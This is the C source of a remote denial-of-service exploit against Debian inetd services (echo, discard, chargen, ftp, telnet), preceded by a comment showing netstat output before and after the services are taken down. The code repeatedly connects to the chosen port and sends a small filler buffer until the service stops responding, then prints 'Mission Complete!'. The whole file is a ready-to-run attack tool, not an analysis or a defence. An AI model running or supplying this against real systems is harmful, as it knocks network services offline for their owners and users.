/* Debian INETd/FTPd/TELNETd Remote Denial of Service (debianinetiftpitelnet.c) Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] debian# netstat -antp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:7 0.0.0.0:* LISTEN 1018/inetd tcp 0 0 0.0.0.0:9 0.0.0.0:* LISTEN 1018/inetd tcp 0 0 0.0.0.0:19 0.0.0.0:* LISTEN 1018/inetd tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 1018/inetd tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1025/sshd tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 1018/inetd tcp 0 0 192.168.0.99:22 192.168.0.100:41709 ESTABLISHED1044/0 debian# bash$ ./debianinetiftpitelnet 192.168.0.99 list Debian INETd/FTPd/TELNETd Remote Denial of Service Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Services: echo discard chargen ftpd telnetd bash$ ./debianinetiftpitelnet 192.168.0.99 echo Debian INETd/FTPd/TELNETd Remote Denial of Service Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Usually takes ~1-2 minutes, LAN/Internet and connection speed will make time vary... 140 tries and echo goes down! Mission Complete! ..... on and on busting all services ..... debian# netstat -antp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1025/sshd tcp 0 0 192.168.0.99:22 192.168.0.100:41709 ESTABLISHED1044/0 debian# This has been tested on full updated Sarge and Etch Boxes. debian# cat /etc/debian_version 3.1 debian# apt-get update && apt-get upgrade ..... 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. debian# && debian# cat /etc/debian_version 4.0 debian# apt-get update && apt-get upgrade ..... 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded. debian# */ #include #include #include #include #include #include #include #include #define COUNT 1000 #define SIZE 32 int main(int argc, char *argv[]) { char buffer[SIZE], debian[SIZE+8]; int i, port; memset(buffer, 0x41, sizeof(buffer)); memset(debian, 0, sizeof(debian)); snprintf(debian, sizeof(debian)-1, "%s\r\n\r\n", buffer); if(argc < 3) { printf("\nDebian INETd/FTPd/TELNETd Remote Denial of Service"); printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n"); printf("\nUsage %s /[list]\n\n", argv[0]); return 0; } printf("\nDebian INETd/FTPd/TELNETd Remote Denial of Service"); printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n"); if(strcmp(argv[2], "list") == 0) { printf("\nServices: echo discard chargen ftpd telnetd\n\n"); return 0; } if(strcmp(argv[2], "echo") == 0) { port = 7; } if(strcmp(argv[2], "discard") == 0) { port = 9; } if(strcmp(argv[2], "chargen") == 0) { port = 19; } if(strcmp(argv[2], "ftpd") == 0) { port = 21; } if(strcmp(argv[2], "telnetd") == 0) { port = 23; } int sock; struct sockaddr_in remote; remote.sin_family = AF_INET; remote.sin_port = htons(port); remote.sin_addr.s_addr = inet_addr(argv[1]); if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; } if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("Error: connect(%s:%d)\n", argv[1], port); return -1; } close(sock); printf("\nUsually takes ~1-2 minutes, LAN/Internet and connection speed will make time vary...\n"); for(i = 0; i <= COUNT; i++) { struct sockaddr_in remote; remote.sin_family = AF_INET; remote.sin_port = htons(port); remote.sin_addr.s_addr = inet_addr(argv[1]); if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; } if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("\n%d tries and %s goes down! Mission Complete!\n\n", i, argv[2]); return -1; } int len = sizeof(debian); send(sock, debian, len, 0); close(sock); } return 0; }

��ŷ��